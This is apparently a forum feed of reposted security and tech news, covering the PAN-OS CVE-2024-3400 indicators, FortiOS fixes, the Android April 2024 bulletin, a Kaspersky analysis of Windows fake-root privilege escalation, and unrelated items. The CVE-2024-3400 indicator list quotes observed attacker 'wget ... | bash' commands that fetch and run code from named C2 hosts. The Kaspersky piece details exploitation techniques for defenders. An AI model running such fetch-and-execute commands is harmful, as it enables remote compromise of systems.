95187. Cortex XDR, XSIAM and the Unified Cloud Agent Cortex XDR and XSIAM agents and analytics help protect and detect against post-exploitation activity if an attacker tries to enumerate or laterally move to other assets. Cortex Xpanse and XSIAM ASM Module Cortex Xpanse has the ability to identify exposed Palo Alto Networks GlobalProtect devices on the public internet and escalate these findings to defenders. Customers can enable alerting on this risk by ensuring that the Palo Alto Networks GlobalProtect Attack Surface Rule is enabled. Identified findings can either be viewed in the Threat Response Center or in the incident view of Expander. These findings are also available for Cortex XSIAM customers who have purchased the ASM module. Indicators of Compromise UPSTYLE Backdoor Update.py 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac 5460b51da26c060727d128f3b3d6415d1a4c25af6a29fef4cc6b867ad3659078 Command and Control Infrastructure 172.233.228[.]93 hxxp://172.233.228[.]93/policy hxxp://172.233.228[.]93/patch 66.235.168[.]222 Hosted Python Backdoor 144.172.79[.]92 nhdata.s3-us-west-2.amazonaws[.]com Observed Commands wget -qO- hxxp://172.233.228[.]93/patch|bash wget -qO- hxxp://172.233.228[.]93/policy | bash Additional Resources CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect Gateway – Palo Alto Networks Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect (CVE-2024-3400) – Volexity Palo Alto Networks Releases Guidance for Vulnerability in PAN-OS, CVE-2024-3400 – Cybersecurity and Infrastructure Security Agency (CISA) Updated April 12, 2024, at 10:15 a.m. PT to add Cortex XDR and XSIAM product protections, as well as Additional Resources. Updated April 12, 2024, at 12:45 a.m. PT to add Cortex Xpanse product protections. UPDATE : Unfortunately, Palo Alto Networks updated their advisory today to warn that previously shared mitigations have been found to be ineffective at protecting devices from the vulnerability. "Earlier versions of this advisory, disabling device telemetry was listed as a secondary mitigation action. Disabling device telemetry is no longer an effective mitigation," reads an update to Palo Alto's advisory. "Device telemetry does not need to be enabled for PAN-OS firewalls to be exposed to attacks related to this vulnerability." Therefore, the best solution is to install the latest PAN-OS software update to fix the vulnerability. Additionally, if you have an active 'Threat Prevention' subscription, you can block ongoing attacks by activating 'Threat ID 95187' threat prevention-based mitigation. https://unit42.paloaltonetworks.com/cve-2024-3400/
  7. SeedTheNet
    More information about "FortiOS 7.0.15 Resolved Issues"
    We are pleased to inform you that Fortinet has released the latest update for FortiOS 7.0, version 7.0.15. This update brings a range of enhancements, optimizations, and security updates to further strengthen your network infrastructure's resilience and performance. Key highlights of the FortiOS 7.0.15 update include: Resolved issues 7.0.15 The following issues have been fixed in version 7.0.15. To inquire about a particular bug, please contact Customer Service & Support. Application Control Bug ID Description 952307 FG-400F sees increased packet loss when using an application list in the policy. FortiGate 6000 and 7000 platforms Bug ID Description 949175 During FIM failover from FIM2 to FIM1, the NP7 PLE sticks on a cache invalidation, stopping traffic. HA Bug ID Description 869557 Upgrading or re-uploading an image to the HA secondary node causes the OS to be un-certified. 1011674 Upgrading from 7.0.14 GA to 7.2.8 GA from an HA secondary node fails with BIOS security level 2. The new image is unrecognized as un-certified and aborts the upgrade process. The HA cluster is unaffected. Hyperscale Bug ID Description 936747 Connections per second (CPS) performance of SIP sessions accepted by hyperscale firewall policies with EIM and EIF disabled that include overload with port block allocation (PBA) GCN IP pools is lower than expected. 949188 ICMP reply packets are dropped by FortiOS in a NAT64 hyperscale policy. 961684 When DoS policies are used and the system is under stress conditions, BGP might go down. 976972 New primary can get stuck on failover with HTTP CC sessions. Intrusion Prevention Bug ID Description 968367 IPS engine high memory usage can cause FortiOS to go into conserve mode. Limitations Bug ID Description 961992 The buffer and description queue limitation of Marvell switch ports causes a performance limitation. Routing Bug ID Description 935370 SD-WAN performance SLA tcp-connect probes clash with user sessions. Security Fabric Bug ID Description 887967 Fabric crashes when synchronizing objects with names longer than 64 characters. 988526 Address object changes from the CLI of the root FortiGate in Security Fabric are not synchronized with downstream devices. SSL VPN Bug ID Description 821240 SSLVPNVD 11 signal failure due to attempt to read out of bounds memory. System Bug ID Description 828557 FortiGate as DHCP relay is not showing a DHCP decline in the debugs when there is an IP conflict in the network. 888941 Some sessions are still reported as offloaded when auto-asic-offload is disabled. 910829 Degraded traffic bandwidth for download passing from 10G to 1G interfaces. 937500, 969083 FortiOS does not accept an installation script from FortiManager when creating an extender-profile with login-password-change is set to yes. 938449 In the 4.19 kernel, when a neighbor's MAC is changed, the session and IPsec tunnel cannot be flushed from the NPU. 943090 Buffer and description queue limitation of Marvell switch port will cause a performance limitation. 949481 The tx_collision_err counter in the FortiOS CLI keeps increasing on both 10G SFP+ X1 and X2 interfaces. 956107 On the FortiGate 400F and 600F, the buffer and description queue limitation of the Marvell switch port causes a performance limitation. 984696 Network usage is not accurately reported by the get system performance status command. 986698 The NP7 should use the updated MAC address from the ARP table to forward traffic to the destination server. 1001938 Support Kazakhstan time zone change to a single time zone, UTC+5. User & Authentication Bug ID Description 1000108 Guest-management administrators cannot see or print guest user passwords in plain text; the password is masked as ENC XXXX string. WiFi Controller Bug ID Description 821320 FG-1800F drops wireless client traffic in L2 tunneled VLAN with capwap-offload enabled. We strongly recommend applying this update to your Fortinet devices to benefit from the latest features, security enhancements, and performance optimizations. Keeping your systems up to date is crucial in maintaining a secure and efficient network environment. For more information about the update process, release notes, and support resources, please visit the Fortinet Support Portal or reach out to Fortinet dedicated support team for assistance.
  8. SeedTheNet
    More information about "Google Issues Security Warning for Pixel Devices: Critical Vulnerabilities Detected"
    Google Issues Security Warning for Pixel Devices: Critical Vulnerabilities Detected Google has issued a security advisory to Pixel users, alerting them to two high severity vulnerabilities that may be under limited, targeted exploitation. These vulnerabilities, identified as CVE-2024-29745 and CVE-2024-29748, pose significant risks and require immediate attention. The first vulnerability, CVE-2024-29745, is classified as an information disclosure vulnerability in the bootloader component. Bootloaders play a crucial role in the boot process of devices, ensuring that essential operating system data is loaded into memory during startup. Exploitation of this vulnerability could lead to unauthorized access to sensitive information stored on the device. The second vulnerability, CVE-2024-29748, is an elevation of privilege (EoP) vulnerability found in the Pixel firmware. Firmware serves as device-specific software that provides fundamental machine instructions necessary for hardware functionality and interaction with other software components. If exploited, this vulnerability could allow attackers to escalate their privileges on the device, potentially gaining control over critical system functions. To address these security risks, Google has released a security patch with a designated level of 2024-04-05 for Pixel devices. It is imperative for Pixel users to apply this security patch promptly to protect their devices from potential exploitation and mitigate the associated risks. Google emphasizes the importance of keeping devices up to date with the latest security patches and software updates to ensure optimal security posture and protect against emerging threats. Users are encouraged to enable automatic updates and regularly check for security patches to stay protected from vulnerabilities and cyber threats. In conclusion, the detection and prompt mitigation of these high severity vulnerabilities underscore Google's commitment to prioritizing user security and addressing potential security risks proactively. Pixel users are urged to take immediate action by applying the latest security patch to safeguard their devices and mitigate the risks associated with these vulnerabilities. ------------------ Android Security Bulletin—April 2024 Published April 1, 2024 The Android Security Bulletin contains details of security vulnerabilities affecting Android devices. Security patch levels of 2024-04-05 or later address all of these issues. To learn how to check a device's security patch level, see Check and update your Android version. Android partners are notified of all issues at least a month before publication. Source code patches for these issues will be released to the Android Open Source Project (AOSP) repository in the next 48 hours. We will revise this bulletin with the AOSP links when they are available. The most severe of these issues is a high security vulnerability in the System component that could lead to local escalation of privilege with no additional execution privileges needed. The severity assessment is based on the effect that exploiting the vulnerability would possibly have on an affected device, assuming the platform and service mitigations are turned off for development purposes or if successfully bypassed. Refer to the Android and Google Play Protect mitigations section for details on the Android security platform protections and Google Play Protect, which improve the security of the Android platform. Android and Google service mitigations This is a summary of the mitigations provided by the Android security platform and service protections such as Google Play Protect. These capabilities reduce the likelihood that security vulnerabilities could be successfully exploited on Android. Exploitation for many issues on Android is made more difficult by enhancements in newer versions of the Android platform. We encourage all users to update to the latest version of Android where possible. The Android security team actively monitors for abuse through Google Play Protect and warns users about Potentially Harmful Applications. Google Play Protect is enabled by default on devices with Google Mobile Services, and is especially important for users who install apps from outside of Google Play. 2024-04-01 security patch level vulnerability details In the sections below, we provide details for each of the security vulnerabilities that apply to the 2024-04-01 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID. Devices with Android 10 and later may receive security updates as well as Google Play system updates. Framework The most severe vulnerability in this section could lead to local escalation of privilege with no additional execution privileges needed. CVE References Type Severity Updated AOSP versions CVE-2024-23710 A-311374917 EoP High 13, 14 CVE-2024-23713 A-305926929 EoP High 12, 12L, 13, 14 CVE-2024-0022 A-298635078 ID High 13, 14 CVE-2024-23712 A-304983146 DoS High 12, 12L, 13, 14 System The most severe vulnerability in this section could lead to local escalation of privilege with no additional execution privileges needed. CVE References Type Severity Updated AOSP versions CVE-2024-23704 A-299931761 EoP High 13, 14 CVE-2023-21267 A-218495634 [2] [3] ID High 12, 12L, 13, 14 CVE-2024-0026 A-308414141 DoS High 12, 12L, 13, 14 CVE-2024-0027 A-307948424 DoS High 12, 12L, 13, 14 Google Play system updates There are no security issues addressed in Google Play system updates (Project Mainline) this month. 2024-04-05 security patch level vulnerability details In the sections below, we provide details for each of the security vulnerabilities that apply to the 2024-04-05 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID. MediaTek components These vulnerabilities affect MediaTek components and further details are available directly from MediaTek. The severity assessment of these issues is provided directly by MediaTek. CVE References Severity Subcomponent CVE-2024-20039 A-323462011 M-MOLY01240012 * High Modem Protocol CVE-2024-20040 A-323465955 M-ALPS08360153 * High wlan firmware CVE-2023-32890 A-323469023 M-MOLY01183647 * High Modem EMM Widevine This vulnerability affects Widevine components and further details are available directly from Widevine. The severity assessment of this issue is provided directly by Widevine. CVE References Severity Subcomponent CVE-2024-0042 A-312543200 * High Widevine DRM Qualcomm components These vulnerabilities affect Qualcomm components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm. CVE References Severity Subcomponent CVE-2024-21468 A-318393412 QC-CR#3614610 [2] High Kernel CVE-2024-21472 A-318393741 QC-CR#3626401 High Kernel Qualcomm closed-source components These vulnerabilities affect Qualcomm closed-source components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm. CVE References Severity Subcomponent CVE-2023-28582 A-299147008 * Critical Closed-source component CVE-2023-28547 A-303101227 * High Closed-source component CVE-2023-33023 A-303101376 * High Closed-source component CVE-2023-33084 A-299146258 * High Closed-source component CVE-2023-33086 A-299146962 * High Closed-source component CVE-2023-33095 A-299146595 * High Closed-source component CVE-2023-33096 A-299146025 * High Closed-source component CVE-2023-33099 A-303101372 * High Closed-source component CVE-2023-33100 A-303101224 * High Closed-source component CVE-2023-33101 A-303101066 * High Closed-source component CVE-2023-33103 A-299146257 * High Closed-source component CVE-2023-33104 A-299146882 * High Closed-source component CVE-2023-33115 A-303101567 * High Closed-source component CVE-2024-21463 A-318393254 * High Closed-source component Common questions and answers This section answers common questions that may occur after reading this bulletin. 1. How do I determine if my device is updated to address these issues? To learn how to check a device's security patch level, see Check and update your Android version. Security patch levels of 2024-04-01 or later address all issues associated with the 2024-04-01 security patch level. Security patch levels of 2024-04-05 or later address all issues associated with the 2024-04-05 security patch level and all previous patch levels. Device manufacturers that include these updates should set the patch string level to: [ro.build.version.security_patch]:[2024-04-01] [ro.build.version.security_patch]:[2024-04-05] For some devices on Android 10 or later, the Google Play system update will have a date string that matches the 2024-04-01 security patch level. Please see this article for more details on how to install security updates. 2. Why does this bulletin have two security patch levels? This bulletin has two security patch levels so that Android partners have the flexibility to fix a subset of vulnerabilities that are similar across all Android devices more quickly. Android partners are encouraged to fix all issues in this bulletin and use the latest security patch level. Devices that use the 2024-04-01 security patch level must include all issues associated with that security patch level, as well as fixes for all issues reported in previous security bulletins. Devices that use the security patch level of 2024-04-05 or newer must include all applicable patches in this (and previous) security bulletins. Partners are encouraged to bundle the fixes for all issues they are addressing in a single update. 3. What do the entries in the Type column mean? Entries in the Type column of the vulnerability details table reference the classification of the security vulnerability. Abbreviation Definition RCE Remote code execution EoP Elevation of privilege ID Information disclosure DoS Denial of service N/A Classification not available 4. What do the entries in the References column mean? Entries under the References column of the vulnerability details table may contain a prefix identifying the organization to which the reference value belongs. Prefix Reference A- Android bug ID QC- Qualcomm reference number M- MediaTek reference number N- NVIDIA reference number B- Broadcom reference number U- UNISOC reference number 5. What does an * next to the Android bug ID in the References column mean? Issues that are not publicly available have an * next to the corresponding reference ID. The update for that issue is generally contained in the latest binary drivers for Pixel devices available from the Google Developer site. 6. Why are security vulnerabilities split between this bulletin and device/partner security bulletins, such as the Pixel bulletin? Security vulnerabilities that are documented in this security bulletin are required to declare the latest security patch level on Android devices. Additional security vulnerabilities that are documented in the device/partner security bulletins are not required for declaring a security patch level. Android device and chipset manufacturers may also publish security vulnerability details specific to their products, such as Google, Huawei, LGE, Motorola, Nokia, or Samsung.
  9. SeedTheNet
    More information about "WhatsApp is currently down"
    WhatsApp, the popular messaging platform used by billions worldwide, experienced a major outage today at 9:00 pm, causing users to be unable to send or receive messages. The outage affected users across various regions Image source : https://downdetector.com/status/whatsapp/ Service seems to be back to normal.
  10. SeedTheNet
    More information about "Sega's Restructuring: Layoffs, Relic's Independence, and Future Projects Unveiled"
    Sega's recent announcement of extensive layoffs has sent shockwaves through the gaming industry, impacting key studios such as Sega Europe, Creative Assembly, and Hardlight. The news came in an email from Sega Europe boss Jurgen Post, detailing the layoffs affecting approximately 240 roles across these studios. Notably, the email also mentioned the sale of Relic Entertainment, responsible for iconic titles like Company of Heroes and Dawn of War. While specific numbers for each studio were not disclosed, Sega did confirm that Sports Interactive and Two Point Studios, also under the Sega Europe umbrella, were not affected. Despite the layoffs, Creative Assembly's upcoming projects, including new entries in the Total War series and an unannounced project, are still in active development. The sale of Relic Entertainment marks a significant transition as the studio moves towards becoming independently operated. Sega expressed its support for this shift, indicating a positive outlook for Relic's future endeavors. Relic itself affirmed its newfound independence, mentioning an external investor aiding in this transition. Notably, work on Company of Heroes 3 and ongoing support for their existing games will continue unabated. This announcement underscores the volatile nature of the gaming industry, where companies must navigate evolving market dynamics while striving to maintain creativity and innovation. As Sega and its associated studios navigate these changes, the gaming community eagerly anticipates the future projects and developments that will emerge from this transformative period. With Relic have posted this with the news announcement : I think after Relic failed with Company of Heroes 3 and ruined the series with this failure , SEGA might have lost more than it invested and realized it is not worth to keep Relic with their failing game CoH3. From a gaming giant in the old school gaming market, to a company that is laying off staff and developers.
  11. SeedTheNet
    More information about "Google Settles Lawsuit, Agrees to Delete Billions of Data Records from Chrome's Incognito Mod"
    Google Settles Lawsuit, Agrees to Delete Billions of Data Records from Chrome's Incognito Mode In a significant development regarding online privacy, Google has reached a settlement in a class-action lawsuit that accused the tech giant of collecting data from users' Chrome browsers while in Incognito mode without proper disclosure. This settlement marks a crucial step in addressing concerns about user privacy and data collection practices in one of the most widely used web browsers globally. The lawsuit, filed in June 2020, alleged that Google collected billions of data records from 136 million Chrome users in the United States while they were browsing in Incognito mode. This mode is designed to offer users a private browsing experience by not storing their browsing history or cookies. However, the lawsuit argued that Google's practices violated users' privacy expectations and failed to provide adequate transparency about data collection activities. As part of the settlement, Google has agreed to delete the data records collected from Chrome users in Incognito mode. This move is significant as it demonstrates Google's acknowledgment of the concerns raised by users and regulatory bodies regarding data privacy. By taking this action, Google aims to address the allegations of undisclosed data collection and improve transparency in its browser's privacy features. The case highlights broader issues surrounding online privacy and the challenges users face in maintaining control over their personal data while using digital services. Incognito mode, although intended to offer a level of privacy, has faced scrutiny for not providing complete anonymity or protection against tracking by websites and third-party entities. In response to the settlement, Google has reaffirmed its commitment to user privacy and stated that it will continue to enhance privacy features in Chrome to provide users with more control over their data. This includes improving transparency about data collection practices, implementing stricter privacy controls, and empowering users to make informed decisions about their online privacy settings. The resolution of this lawsuit serves as a reminder of the importance of transparency, accountability, and user empowerment in the digital age. It highlights the ongoing efforts by both technology companies and regulators to address privacy concerns and create a more privacy-conscious digital ecosystem that respects users' rights to data protection and control.
  12. SeedTheNet
    More information about "A patched Windows attack surface is still exploitable - Kaspersky Securelist"
    14 Mar 2024 Authors Elsayed Elrefaei Ashraf Refaat Kaspersky GERT On August 8, 2023, Microsoft finally released a kernel patch for a class of vulnerabilities affecting Microsoft Windows since 2015. The vulnerabilities lead to elevation of privilege (EoP), which allows an account with user rights to gain SYSTEM privileges on a vulnerable host. The root cause of this attack surface, according to a 2015 blog, is the ability of a normal user account to replace the original C:\ drive with a fake one by placing a symlink for the system drives in the device map for each login session. This fake drive will be followed by the kernel during impersonation instead of the original system drive. More than five months after the patches for these vulnerabilities were released, we’re still seeing some of their exploits in the wild because it’s a very easy way to get a quick NT AUTHORITY\SYSTEM and that’s why it may be favored by well-known threat actors. We discussed these findings at the BlackHat MEA conference in November 2023, and in December 2023 and January 2024, we found two exploits that could still use this attack surface in the unpatched version of Windows. Both exploits are packed in UPX. After analyzing the first one, we saw that it was a packed version of a Google Project Zero PoC sample. The other sample was a packed version of an SSD Secure Disclosure public PoC, even using the same NamedPipe “\\\\.\\Pipe\\TyphoonPWN” without modifications. The PDB paths for both samples are: C:\Users\Administrator\source\repos\exp\x64\Release\exp.pdb C:\VVS-Rro\CVEs\spool\BitsPoc\src\x64\Release\PoC_BITs.pdb Below we will highlight the key points and then focus on how to check if any of the vulnerabilities have been exploited or if there have been any attempts to exploit them, and enumerate popular CVEs included in this vulnerable surface. Affected processes and services include native Windows services that run by default on most versions of the operating system. These include: CSRSS Windows Error Reporting (WER) File history service Background intelligence transfer service (BITS) Print Spooler Vulnerable Windows processes and services The exploits affecting this attack surface share a common logic or pattern, including: Searching for a DLL that runs with system integrity. The DLL has an isolation-aware manifest file. The ability to change the C:\ root to a writable directory via symlinks. CSRSS | CVE-2022-22047 This Activation Context Cache Poisoning vulnerability leads to local privilege escalation. It’s one of the CVEs that was actively exploited by a threat actor called KNOTWEED | Denim Tsunami. Reversing the in-the-wild exploit for the CVE-2022-22047 shows: The exploit crafts a call into CSRSS. The call requests an activation context for a privileged executable and specifies a malicious manifest. The manifest uses an undocumented manifest XML attribute named loadFrom. This attribute allows unrestricted redirection of DLLs to any location on a disk, including locations outside of the normal search path, without even having to change the C:\ root drive. Here is a detailed blog post by ZDI explaining CSRSS Cache Poisoning. CSRSS | CVE-2022-37989 The second vulnerability, involving CSRSS Cache Poisoning, was a workaround for the first CVE-2022-22047. After patching the undocumented “LoadFrom” attribute, there was another attribute that could be abused to load a manifest file from a user-controlled path by declaring a dependent assembly using path traversal in the name attribute. The patch for the CVE-2022-37989 was simple: check if the name attribute of the dependency contains any forward or backward slashes, and set a flag to stop caching this suspicious manifest if name path traversal is detected. This CVE was discovered by ZDI. Print Spooler | CVE-2022-29104 Print Spooler is a service that runs by default in almost all versions of Windows. It’s responsible for managing paper print jobs sent from a computer to a printer or print server. Reversing in-the-wild exploits of the CVE-2022-29104 Print Spooler vulnerability shows that it’s a .NET sample that creates a symbolic link from C:\ to the fake root C:\Imprint. The sample was uploaded to VirusTotal. Fake C:\ drive structure: C:\Imprint\Windows\system32 C:\Imprint\Windows\WinSxS All folders inside the Imprint folder are writable, allowing an attacker to control their contents. Path traversal is added to “AssemblyIdentity” to point to the Imprint writable path. The vulnerability analysis shows that: An attacker can remap the root drive (C:\) for privileged processes during impersonation. During impersonation, all file accesses are performed using the DOS device map of the impersonated process. CSRSS uses a user-modified side-by-side manifest for generating the activation context instead of the manifest in the WinSxS folder C:\Windows\WinSxS. The WinSxS folder stores multiple copies of system files and components. The WinSxS folder provides a central location for storing different versions of system files that are shared by multiple applications and processes. The WinSxS folder provides system stability and compatibility by allowing different applications to use the specific versions of files they need. WinSxS avoids DLL hell, a problem that occurs when different applications require different versions of the same DLL. The Windows operating system uses the application manifest to determine which version is appropriate for which app. The application manifest is stored in XML format and describes: The dependencies associated with the application. What permissions the application requires. What compatibility settings the application supports. CSRSS mitigation was enabled for spoolsv.exe and printfilterpipelinesvc.exe to stop impersonation while loading external resources, and then to resume impersonation after the external resources are loaded. Print Spooler | CVE-2022-41073 After CVE-2022-29104 was patched, another vulnerability affecting Print Spooler was discovered – CVE-2022-41073. Reversing the in-the-wild exploit of this vulnerability shows some XML manipulation using path traversal to a writable path containing a modified version of prntvpt.dll that is loaded by Print Spooler. According to Project Zero, mitigation was added to CSRSS, the patch simply stopped any impersonation prior to the LoadLibraryExW call in winspool!LoadNewCopy, and then resumed it. After that the LoadLibraryExW call returned: + if (RevertToProcess(&TokenHandle, x) >= 0) { lib = LoadLibraryExW(arg1, 0, dwFlags); + ResumeImpersonation(TokenHandle); + } 1 2 3 4 + if (RevertToProcess(&TokenHandle, x) >= 0) { lib = LoadLibraryExW(arg1, 0, dwFlags); + ResumeImpersonation(TokenHandle); + } NtOpenFile is called with the OBJ_IGNORE_IMPERSONATED_DEVICEMAP flag. It will stop impersonation when loading any external resources while using the LoadNewCopy API. Stopping impersonation means that privileged processes will not use the fake root implemented with the medium integrity process, and instead it will use the original C:\ drive root to avoid loading untrusted or malicious resources. Windows Error Reporting | CVE-2023-36874 Windows Error Reporting (WER) is a privileged service that analyzes and reports various software issues in Windows. The root cause for the exploitation of the CVE-2023-36874 vulnerability is CreateProcess API when a crash happens, because CreateProcess API can be tricked into following the fake root and creating the process from this writable fake root in the context of the privileged WER service, leading to privilege escalation. CVE-2023-36874 was exploited in the wild and has several published PoCs. The exploit interacts with the IWerReport COM interface and calls SubmitReport, then UtilLaunchWerManager is called, which calls CreateProcess. CreateProcess API is then vulnerable to DoS device modification. Once the exploit to submit a fake crash report is executed, it will end up calling the vulnerable CreateProcess API. File History Service | CVE-2023-35359 File History Service can be used to automatically back up personal folders and files such as documents, pictures and videos. Reversing the in-the-wild exploit shows that when File History Service starts, it impersonates the current user and then loads a DLL called fhcfg.dll under impersonation. This DLL has an “application aware manifest config” that attempts to load another resource called msasn1.dll. The exploit starts with the usual technique of changing the C:\ root to a fake writable root. Windows Error Reporting – 2nd exploit | CVE-2023-35359 After patching the first Windows Error Reporting vulnerability, which used the CreateProcess API inside the privileged WER service and follows the fake root to create a process. The patched WER service started using CreateProcessAsUser instead of CreateProcess API. However, after that patch, adversaries found another way that could lead to the use of CreateProcess again under certain conditions, which was considered a new vulnerability. For example, if the WER service was marked as disabled on a system and there was a privileged process impersonating a medium-integrity user on that system, and an unhandled exception occurs during impersonation that results in a crash, that crash tries to enable the WER service for reporting. The detailed analysis for this CVE shows that it does not appear to be exploitable. The exploitation of CVE-2023-35359 BITS | CVE-2023-35359 The Background Intelligence Transfer Service (BITS) is responsible for facilitating the asynchronous and prioritized transfer of files between a client and a server. BITS operates in the background, which means it can perform file transfers without interrupting a user or consuming all of the available network. You may notice that the number CVE-2023-35359 has not changed for the last three CVEs because Microsoft decided in the last patch to assign the same CVE to all vulnerabilities of this type. So there are different vulnerabilities in different processes/services but with the same CVE number. Timeline for the bypassing/patching process from 2015 to August 2023 How was the patch for this attack surface applied? The patch was applied to ObpLookupObjectName to check if the loaded resource is a file object and the call to ObpUseSystemDeviceMap succeeds. It then ignores the impersonation and uses SystemDevice. ObpLookupObjectName checks FileObjectType followed by a call to ObpUseSystemDeviceMap. The ObpUseSystemDeviceMap function checks for the SystemDevice to be used instead of the impersonated device. How to check if a vulnerability was exploited or any attempts were made to exploit it? When analyzing most of the exploits targeting this attack surface, we observed a common behavior that could be used as an indicator of whether there were any attempted exploits: Most of the in-the-wild exploits create a writable folder inside the C:\ drive, and the structure of this folder mimics the structure of the original C:\ drive, for example: C:\Windows\System32 → C:\FakeFolder\Windows\System32 C:\Windows\WinSxS → C:\FakeFolder\Windows\WinSxS So finding a writable folder that mimics the C:\ drive folder structure may be an indicator of an exploitation attempt. Copying the manifest files from the original WinSxS folder in C:\Windows\WinSxS to a writable directory and modifying them could be a good indicator of an exploitation attempt. Manifest files that contain undocumented XML attributes such as “LoadFrom” or manifest files that contain path traversal in the “name” attribute could be a valid sign of an exploitation attempt. Creating a symbolic link from the original system drive to a writable directory, especially from processes with medium integrity using the \RPC Control\ object directory.
  13. SeedTheNet
    More information about "US Government Updates DDoS Guidelines to Enhance Cybersecurity"
    The United States government has recently updated its Distributed Denial of Service (DDoS) guidelines on March 2024 The updated guidelines, released by the Cybersecurity and Infrastructure Security Agency (CISA), provide comprehensive recommendations and best practices to mitigate the impact of DDoS attacks. These guidelines are designed to help organizations across various sectors, including government agencies, private enterprises, and critical infrastructure operators, better defend against and respond to DDoS incidents. DoS and DDoS A DoS and a DDoS attack are similar in that they both aim to disrupt the availability of a target system or network. However, there are key differences between the two. 1. DoS Attack: A DoS attack involves a single source used to overwhelm the target system with a flood of traffic or resource-consuming requests. The malicious actor typically uses one computer or a small number of computers to generate the attack. The goal of a DoS attack is to render the target system unavailable to its intended users and deny them access to resources or services. 2. DDoS Attack: A DDoS attack involves multiple sources. Often, a multitude of compromised computers—known as botnets—are coordinated to launch the attack. Each machine in the botnet sends a flood of traffic or requests to the target system simultaneously to amplify the follow-on impact. Due to the distributed nature of a DDoS attack, defending targeted networks has increased difficulty compared to a DoS attack. The main advantage of a DDoS attack over a DoS attack is the ability to generate a significantly higher volume of traffic, overwhelming the target system’s resources to a greater extent. DDoS attacks can also employ various techniques, such as IP spoofing, which involves a malicious actor manipulating the source IP address and botnets to disguise the origin of the attack and make it more difficult to trace it back to them. In terms of impact, both DoS and DDoS attacks can disrupt the availability of a targeted system or network, leading to service outages, financial losses, and reputational damage. DoS and DDoS Attacks Categorized Into Three Technique Types 1. Volume-Based Attacks: These attacks aim to consume the available bandwidth or system resources of the target by overwhelming it with a massive volume of traffic. The goal is to saturate the network or exhaust the target’s resources, rendering it unable to handle legitimate requests. Source : Taken from the PDF file, rest can be found in the bottom of the post with the PDF Link. The updated guidelines underscore the evolving nature of cyber threats and the need for proactive measures to safeguard digital assets and critical infrastructure. By adopting these guidelines and investing in cybersecurity measures, organizations can strengthen their resilience against DDoS attacks and contribute to a more secure cyber landscape. The guideline can be found here : https://www.cisa.gov/sites/default/files/2024-03/Understanding and Responding to Distributed Denial-of-Service Attacks_508c.pdf
  14. SeedTheNet
    More information about "WARNING: Global themes and widgets created by 3rd party developers for Plasma can and will run arbitrary code."
    WARNING: Global themes and widgets created by 3rd party developers for Plasma can and will run arbitrary code. You are encouraged to exercise extreme caution when using these products. A user has had a bad experience installing a global theme on Plasma and lost personal data. https://www.reddit.com/r/kde/comments/1bixmbx/do_not_install_global_themes_some_wipe_out_all/ Global themes change the look of Plasma, but also the behavior. To do this they run code, and this code can be faulty, as in the case mentioned above. The same goes for widgets and plasmoids. For now as CAUTION , better not to download any custom themes for Plasma KDE Linux https://floss.social/@kde/112128243960545659
  15. SeedTheNet
    More information about "Apex Legends ALGS NA Final Postponed Due to Cheats"
    Due to cheats being used in the Final , the Tournament was postponed and a twitter post by Apex Legends Esports states the following : While Easy Anti Cheat stating this after According to PCGAMESN website that : Midway through their match on Storm Point, TSM’s Phillip ‘ImperialHal’ Dosen and DarkZero’s Noyan ‘Genburten’ Ozkose were both hit by what appears to be an RCE hack, meaning that the bad actor could, in theory, manipulate elements of their games. As a result, both players had their cheats toggled on instead of off, hence Hal’s “I’ve got an aimbot.”Additionally, as the hack went through, a bizarre message seems to have popped up on Genburten’s screen, showing that cheats were, in fact, switched on mid-match. As a result, Respawn terminated the match, officially stating that “due to the competitive integrity of this series being compromised, we have made the decision to postpone the NA finals at this time. We will share more information soon.” --- It is quite weird and funny how even in Tournaments , Gamers will still try to cheat while the Anti-Cheat software or the people who monitor are almost useless. Paying a license to anticheat software as a developer that won't be able to protect your game even in a country wide tournament.. is quite an astonishing disappointment. EAC clarifying that their software is not vulnerable but not clarifying about the cheat being un-detected is also more funny. Gamers were hacking their way to the 2 millions
×
×
  • Create New...

Important Information

Privacy Policy

  I accept